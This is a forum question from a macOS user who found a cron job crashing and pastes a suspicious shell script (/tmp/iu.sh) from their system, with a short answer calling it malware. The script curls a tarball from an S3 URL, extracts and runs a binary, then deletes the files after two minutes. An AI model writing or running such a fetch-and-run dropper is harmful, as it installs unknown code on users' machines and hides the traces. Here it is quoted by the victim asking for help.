Thanks to the mail function of the Terminal it came to my attention that there was some kind of cron job being executed with some errors.
The mail of the cron gives this info:
2018-08-02 23:47:22.698 xSf[717:27543] *** Terminating app due to uncaught exception 'NSInvalidArgumentException', reason: '*** -[_NSPlaceholderData initWithBase64EncodedString:options:]: nil string argument'
*** First throw call stack:
(
0 CoreFoundation 0x00007fff57d622db __exceptionPreprocess + 171
1 libobjc.A.dylib 0x00007fff7eeffc76 objc_exception_throw + 48
2 CoreFoundation 0x00007fff57df3d7d +[NSException raise:format:] + 205
3 Foundation 0x00007fff59e028ee -[NSData(NSData) initWithBase64EncodedString:options:] + 84
4 xSf 0x000000010b54fd19 INJECTOR_decryptData_RNCryptor + 121
5 xSf 0x000000010b55010a -[l196gKNh f27WaC8u:path:] + 410
6 xSf 0x000000010b54ff2e -[l196gKNh s7PJWuXO:] + 158
7 xSf 0x000000010b552cd1 main + 225
8 libdyld.dylib 0x00007fff7fb19015 start + 1
)
libc++abi.dylib: terminating with uncaught exception of type NSException
/tmp/iu.sh: line 6: 717 Abort trap: 6 ./xSf
It seems this was executed by some script located in: ~/Library/sandastros.np/sandastros.np whose content I can't be able to read or decypher.
I checked that script located in /tmp/iu.sh that contains the following:
#!/bin/bash
/usr/bin/curl -s -L -o /var/tmp/xSf.tgz "https://s3.amazonaws.com/xsfer/xSf.tgz"
mkdir -p /var/tmp/xSf
tar -xzf /var/tmp/xSf.tgz -C /var/tmp/xSf/
cd /var/tmp/xSf/
./xSf
func_cccc(){
sleep 120
rm -rf /var/tmp/xSf
rm -rf /var/tmp/xSf.tgz
}
func_cccc &
That URL is reachable but I didn't want to download and open the tar file.
The /tmp folder permissions are properly set, though the iu.sh has my user as owner, so it seems allowing the installation of anything I might have given permissions to it.
Any clue about what is this?
Best Answer
It looks a lot like some kind of malware.
If you do not know where xSF and sandastros.np came from, I would consider the computer compromised and do a full format and reinstall.